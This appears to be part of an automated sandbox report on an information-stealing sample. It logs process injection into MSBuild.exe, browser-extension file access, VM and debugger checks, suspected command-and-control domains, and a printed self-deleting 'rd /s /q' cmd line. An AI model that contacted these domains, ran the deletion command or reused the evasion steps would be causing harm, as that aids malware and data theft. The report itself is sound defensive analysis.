Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00415182 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA, 1_2_00415182
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00410F8F GetSystemInfo,wsprintfA, 1_2_00410F8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: Amcache.hve.4.dr Binary or memory string: VMware
Source: MSBuild.exe, 00000001.00000002.2227078403.0000000001216000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWw
Source: Amcache.hve.4.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.4.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.4.dr Binary or memory string: VMware, Inc.
Source: MSBuild.exe, 00000009.00000002.2216781239.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW\T
Source: Amcache.hve.4.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.4.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.4.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: MSBuild.exe, 00000001.00000002.2227078403.00000000011E5000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2227078403.0000000001216000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.2217098930.0000000000B51000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.2216781239.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.4.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: MSBuild.exe, 00000001.00000002.2227078403.00000000011B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware-
Source: Amcache.hve.4.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.4.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.4.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr Binary or memory string: vmci.sys
Source: Amcache.hve.4.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: MSBuild.exe, 00000001.00000002.2227078403.00000000011E5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.4.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.4.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.4.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr Binary or memory string: VMware20,1
Source: Amcache.hve.4.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.4.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.4.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: MSBuild.exe, 00000001.00000002.2227078403.00000000011B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: Amcache.hve.4.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.4.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.4.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.4.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.4.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.4.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.4.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.4.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Process queried: DebugPort
Source: C:\ProgramData\AAFIIJDAAA.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DB7922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00DB7922
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00418ADE GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_00418ADE
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DB2003 mov edi, dword ptr fs:[00000030h] 0_2_00DB2003
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DDE385 mov eax, dword ptr fs:[00000030h] 0_2_00DDE385
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DDE37A mov eax, dword ptr fs:[00000030h] 0_2_00DDE37A
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DDE362 mov eax, dword ptr fs:[00000030h] 0_2_00DDE362
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DF55FE mov eax, dword ptr fs:[00000030h] 0_2_00DF55FE
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DCA64C mov eax, dword ptr fs:[00000030h] 0_2_00DCA64C
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DC0F2E mov ecx, dword ptr fs:[00000030h] 0_2_00DC0F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_004014AD mov eax, dword ptr fs:[00000030h] 1_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040148A mov eax, dword ptr fs:[00000030h] 1_2_0040148A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_004014A2 mov eax, dword ptr fs:[00000030h] 1_2_004014A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00418725 mov eax, dword ptr fs:[00000030h] 1_2_00418725
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00418726 mov eax, dword ptr fs:[00000030h] 1_2_00418726
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001B2003 mov edi, dword ptr fs:[00000030h] 8_2_001B2003
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001CA64C mov eax, dword ptr fs:[00000030h] 8_2_001CA64C
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001C0F2E mov ecx, dword ptr fs:[00000030h] 8_2_001C0F2E
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DCCC4B GetProcessHeap, 0_2_00DCCC4B
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DB7610 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00DB7610
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DB7922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00DB7922
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DB7AAF SetUnhandledExceptionFilter, 0_2_00DB7AAF
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DBDA73 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00DBDA73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0041D1A8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_0041D1A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0041DB1C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0041DB1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_004277BE SetUnhandledExceptionFilter, 1_2_004277BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB8B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_6CB8B66C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB8B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_6CB8B1F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CD3AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_6CD3AC62
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001B7610 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_001B7610
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001B7922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_001B7922
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001BDA73 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_001BDA73
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001B7AAF SetUnhandledExceptionFilter, 8_2_001B7AAF

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: T2bmenoX1o.exe PID: 7284, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7300, type: MEMORYSTR
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
Source: C:\ProgramData\AAFIIJDAAA.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040F51F _memset,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,ResumeThread,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread, 1_2_0040F51F
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
Source: C:\ProgramData\AAFIIJDAAA.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
Source: AAFIIJDAAA.exe String found in binary or memory: isoplethui.sbs
Source: AAFIIJDAAA.exe String found in binary or memory: frizzettei.sbs
Source: AAFIIJDAAA.exe String found in binary or memory: exemplarou.sbs
Source: AAFIIJDAAA.exe String found in binary or memory: wickedneatr.sbs
Source: AAFIIJDAAA.exe String found in binary or memory: invinjurhey.sbs
Source: AAFIIJDAAA.exe String found in binary or memory: laddyirekyi.sbs
Source: AAFIIJDAAA.exe String found in binary or memory: exilepolsiy.sbs
Source: AAFIIJDAAA.exe String found in binary or memory: bemuzzeki.sbs
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0041247D __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 1_2_0041247D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00412554 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 1_2_00412554
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 430000
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43D000
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 670000
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 671000
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: F03008
Source: C:\ProgramData\AAFIIJDAAA.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
Source: C:\ProgramData\AAFIIJDAAA.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
Source: C:\ProgramData\AAFIIJDAAA.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 44B000
Source: C:\ProgramData\AAFIIJDAAA.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 44E000
Source: C:\ProgramData\AAFIIJDAAA.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 45E000
Source: C:\ProgramData\AAFIIJDAAA.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 904008
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\ProgramData\AAFIIJDAAA.exe "C:\ProgramData\AAFIIJDAAA.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\KJKFBAFIDAEB" & exit
Source: C:\ProgramData\AAFIIJDAAA.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DDE076 cpuid 0_2_00DDE076
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: GetACP,IsValidCodePage,GetLocaleInfoW, 0_2_00DCC085
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: GetLocaleInfoW, 0_2_00DC622B
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: EnumSystemLocalesW, 0_2_00DCC372
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: EnumSystemLocalesW, 0_2_00DCC327
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 0_2_00DCC498
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,__calloc_crt,_free, 0_2_00E0244B
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: EnumSystemLocalesW, 0_2_00DCC40D
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 0_2_00E045DE
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: GetLocaleInfoW, 0_2_00DCC6EB
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_00DCC814
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_00DCC9E9
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: GetLocaleInfoW, 0_2_00DCC91A
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free, 0_2_00E06AB8
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_free,_free,_free,_free,_free,_free,_free,_free,_free, 0_2_00E07BA8
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free, 0_2_00E06DD6
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: EnumSystemLocalesW, 0_2_00DC5D7F
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 0_2_00E05E2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 1_2_00410DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoA, 1_2_0042E834
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 1_2_0042B25C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA, 1_2_0042B351
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free, 1_2_00429BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen, 1_2_0042B3F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, 1_2_0042B453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement, 1_2_0042ACD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW, 1_2_00425573
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 1_2_0042B624
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea, 1_2_0042762C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: EnumSystemLocalesA, 1_2_0042B6E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free, 1_2_00429EFE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l, 1_2_0042E6FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 1_2_00428F54
